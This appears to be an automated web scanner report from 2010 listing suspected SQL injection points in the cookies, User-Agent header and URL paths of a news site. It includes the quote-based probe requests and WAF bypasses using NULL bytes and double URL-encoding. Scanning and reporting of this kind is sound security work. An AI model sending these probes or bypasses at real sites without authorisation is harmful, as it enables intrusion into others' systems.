Vary: Accept-Encoding, User-Agent
Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The ebNewBandWidth_.www.informationweek.com cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ebNewBandWidth_.www.informationweek.com cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /blog/main/archives/wolfes_den/index.html HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333'; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:21:20 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:20 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 174152
<html><head><!-- <meta http-equiv="refresh" content="300;url=?cid=ref-true"> --><title>InformationWeek's Wolfe's Den Weblog</title><META NAME="y_key" CONTENT="15bba51c08c024d1"><META NAME="robot ...[SNIP]... <p>Former counter-terrorism advisor Richard Clarke has a new book out, and it's scary stuff for all of us concerned about the national security of the United States. Scarier still, the alarms sounded by the book -- "Cyber War ...[SNIP]...
Request 2
GET /blog/main/archives/wolfes_den/index.html HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333''; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:21:22 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:22 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/blog/main/archives/wolfes_den/index.html&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The s_lv_s cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_lv_s cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /blog/main/archives/wolfes_den/index.html HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days%00';
Response 1
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:21:29 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:29 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 174152
<html><head><!-- <meta http-equiv="refresh" content="300;url=?cid=ref-true"> --><title>InformationWeek's Wolfe's Den Weblog</title><META NAME="y_key" CONTENT="15bba51c08c024d1"><META NAME="robot ...[SNIP]... <p>Former counter-terrorism advisor Richard Clarke has a new book out, and it's scary stuff for all of us concerned about the national security of the United States. Scarier still, the alarms sounded by the book -- "Cyber War ...[SNIP]...
Request 2
GET /blog/main/archives/wolfes_den/index.html HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days%00'';
Response 2
HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:21:31 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:31 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/blog/main/archives/wolfes_den/index.html&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /events/ HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:20:42 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:20:42 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 100432
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><t ...[SNIP]... </strong> you ensure increased productivity, eliminate errors, deliver the right resolution on the first attempt and most importantly add value to customers, prospects and your bottom line. <strong> ...[SNIP]...
Request 2
GET /events/ HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)''
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:20:43 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:20:43 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/events/index.jhtml&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The iwkbtn_101201 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the iwkbtn_101201 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /events/ HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731%00'; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:20:01 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:20:01 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 100431
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><t ...[SNIP]... </strong> you ensure increased productivity, eliminate errors, deliver the right resolution on the first attempt and most importantly add value to customers, prospects and your bottom line. <strong> ...[SNIP]...
Request 2
GET /events/ HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731%00''; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:20:02 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:20:02 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/events/index.jhtml&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The s_lv cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_lv cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /events/ HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529'; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:19:50 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:19:50 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 100431
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><t ...[SNIP]... </strong> you ensure increased productivity, eliminate errors, deliver the right resolution on the first attempt and most importantly add value to customers, prospects and your bottom line. <strong> ...[SNIP]...
Request 2
GET /events/ HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529''; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:19:51 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:19:51 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/events/index.jhtml&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /newsletters'/DR_subscribe.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 00:22:33 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:22:33 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 29746
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <p class="StoryContentColor">The URL (Web address) that has been entered is directing to a non-existent page on the InformationWeek.com website. Please check that there are no typographical errors in the URL. If the URL is correct, then <a href="http://www.informationweek.com/contactus.jhtml;jsessionid=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN#onlineprod"> ...[SNIP]...
Request 2
GET /newsletters''/DR_subscribe.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:22:35 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:22:35 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/newsletters''/DR_subscribe.jhtml&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /video/security'/ HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 00:22:29 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:22:29 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 30117
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <p class="StoryContentColor">The URL (Web address) that has been entered is directing to a non-existent page on the InformationWeek.com website. Please check that there are no typographical errors in the URL. If the URL is correct, then <a href="http://www.informationweek.com/contactus.jhtml;jsessionid=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN#onlineprod"> ...[SNIP]...
Request 2
GET /video/security''/ HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:22:31 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:22:31 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/video/security''/&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The iwkbtn_101201 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the iwkbtn_101201 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /video/security/ HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731'; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:21:32 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:32 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 69110
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><t ...[SNIP]... <span>Although a few Network Access Control players have begun to fail and exit the market, StillSecure is going strong. We caught up with Chief Strategist Alan Shimmel at Interop 2008 in Las Vegas.</span> ...[SNIP]...
Request 2
GET /video/security/ HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731''; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:21:33 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:33 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/video/security/index.jhtml&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The iwkbtn_emc_101111 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the iwkbtn_emc_101111 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the iwkbtn_emc_101111 cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /video/security/ HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541%2527; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:21:37 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:37 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 69110
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><t ...[SNIP]... <span>Although a few Network Access Control players have begun to fail and exit the market, StillSecure is going strong. We caught up with Chief Strategist Alan Shimmel at Interop 2008 in Las Vegas.</span> ...[SNIP]...
Request 2
GET /video/security/ HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541%2527%2527; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:21:39 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:39 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/video/security/index.jhtml&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /video/security%2527/20979809001 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:22:18 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:22:18 GMT
